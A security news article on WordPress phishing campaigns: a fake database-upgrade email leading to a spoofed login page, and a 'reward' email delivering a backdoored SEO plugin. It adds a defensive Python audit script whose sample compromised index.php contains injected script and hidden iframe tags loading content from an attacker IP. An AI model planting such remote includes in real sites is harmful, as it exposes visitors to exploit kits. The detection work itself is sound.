Beware Phishing Campaigns Against Wordpress Users


The Hacker News has analyzed the log files from the forum victim's server and found "many Wordpress CMS based educational (EDU) and government (GOV) websites from where the attack was originated." It says that more than 100,000 IP addresses were involved in the attack, and "the victim's Forum website received more than 40,000 requests in 7 minutes from different WordPress blogs and IP addresses." Among those websites it found more than 4000 EDU and GOV sites, including, for example, open.nasa.gov and tech.journalism.cuny.edu. 

For this attack, suggests Hacker News, "thousands of outdated legitimate Wordpress blogs were abused to perform DDoS attacks using previously known vulnerabilities." It is important, therefore, for WordPress users to keep their software up to date. But care must still be taken: reports suggest that phishers are now exploiting this very need to patch.

Mickey Mellen warned on the Google+ social network, "There's a fancy new WordPress-based phishing scheme going around that you need to be aware of." Complete with screenshots, he explains that it starts with an email saying, "Your Wordpress database is out-of-date, and must be upgraded now." The update link leads to a spoofed WordPress login screen actually hosted on howsagoin.nl. If the user enters any login details, they're lost – but to allay suspicions, that user is then redirected to the official WordPress upgrade page.

Now Sucuri has described a different campaign. This one takes advantage of the season of goodwill and giving. The email states, "You have been chosen by Wordpress to take part in our Customer Rewarding Program. You are the 23rd from 100 unique winners." The reward is a free copy, usually costing $79.00, of the "#1 most downloaded WordPress plugin:" the 'All in One SEO Pack Pro.'

Sucuri accepted the invitation and downloaded the plugin. "It looks exactly like the original 'All in One SEO pack' plugin," wrote Sucuri CTO Daniel Cid in a company blog, "except that they added a backdoor to the file aioseop_class.php." That backdoor allows the attackers to modify the site's index.php page. "Once your index.php has been modified, the bad guys can start to display malicious content to anyone visiting the compromised site," says Cid.

The attack then focuses on the website's visitors. "From there it forces the user's browser to download more content from http://91.239.15.61/google.js, and http://91.239.15.61/g.php, redirecting the user to SPAM (porn) sites, or to exploit kits where it will try to compromise the visitor further."
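As an added illustration of how a site owner would look for the two symptoms Cid describes (a plugin file that no longer matches the vendor's original, and an index.php that has been altered to pull content from an attacker-controlled host), the following Python script is not from the article or from Sucuri. The file contents, the "known good" hash manifest and the sample compromised install are all constructed for the demo; the only value taken from the article is the host 91.239.15.61.

```python
import hashlib
import re
from typing import Dict, List

# Constructed "known good" manifest. In practice, hash the plugin files from the
# official wordpress.org download and keep the manifest somewhere the web
# server process cannot write to.
PRISTINE_PLUGIN = b"<?php\n// All in One SEO Pack: pristine plugin code (constructed stand-in)\n"
KNOWN_GOOD: Dict[str, str] = {
    "all-in-one-seo-pack/aioseop_class.php": hashlib.sha256(PRISTINE_PLUGIN).hexdigest(),
}

# Constructed sample of a compromised install: the plugin file has extra code
# appended (represented by a placeholder comment) and index.php has had remote
# includes added that point at the host named in the article.
SAMPLE_FILES: Dict[str, bytes] = {
    "all-in-one-seo-pack/aioseop_class.php": PRISTINE_PLUGIN
        + b"// <-- extra code appended by the trojanised copy (placeholder)\n",
    "index.php": (
        b"<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"
        b"?><script src=\"http://91.239.15.61/google.js\"></script>\n"
        b"<iframe src=\"http://91.239.15.61/g.php\" width=\"0\" height=\"0\"></iframe>\n"
    ),
}

# <script>/<iframe> tags whose src points at a bare IPv4 host rather than a name.
_REMOTE_INCLUDE = re.compile(
    r'<(?:script|iframe)\b[^>]*?\bsrc\s*=\s*["\']?'
    r'(https?://(?:\d{1,3}\.){3}\d{1,3}[^"\'\s>]*)',
    re.IGNORECASE,
)


def check_integrity(files: Dict[str, bytes], manifest: Dict[str, str]) -> List[str]:
    """Return manifest paths whose SHA-256 differs from the recorded one (or are missing)."""
    tampered = []
    for path, expected in sorted(manifest.items()):
        data = files.get(path)
        if data is None or hashlib.sha256(data).hexdigest() != expected:
            tampered.append(path)
    return tampered


def find_remote_includes(content: bytes) -> List[str]:
    """Return script/iframe src URLs in the file that point at a bare IP address."""
    text = content.decode("utf-8", errors="replace")
    return _REMOTE_INCLUDE.findall(text)


def audit(files: Dict[str, bytes], manifest: Dict[str, str]) -> Dict[str, object]:
    """Run both checks; the stock WordPress index.php is three lines of PHP with no HTML,
    so any remote include found in it is a strong sign of the modification Cid describes."""
    injected = {}
    for path, data in files.items():
        if path.endswith("index.php"):
            hits = find_remote_includes(data)
            if hits:
                injected[path] = hits
    return {"tampered": check_integrity(files, manifest), "injected": injected}


if __name__ == "__main__":
    print(audit(SAMPLE_FILES, KNOWN_GOOD))
```

Run against the constructed sample, the audit reports the plugin file as tampered and lists both remote includes found in index.php. The hash check is the reliable part: a trojanised plugin can be byte-for-byte identical to the original apart from the backdoor, which no signature on the injected HTML will catch, so compare against hashes of the copy you downloaded from wordpress.org rather than the copy a "reward" email delivered.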

"When all else fails," warns Sucuri, "the bad guys can always rely on some basic social engineering tactics with a little bit of phishing!!"
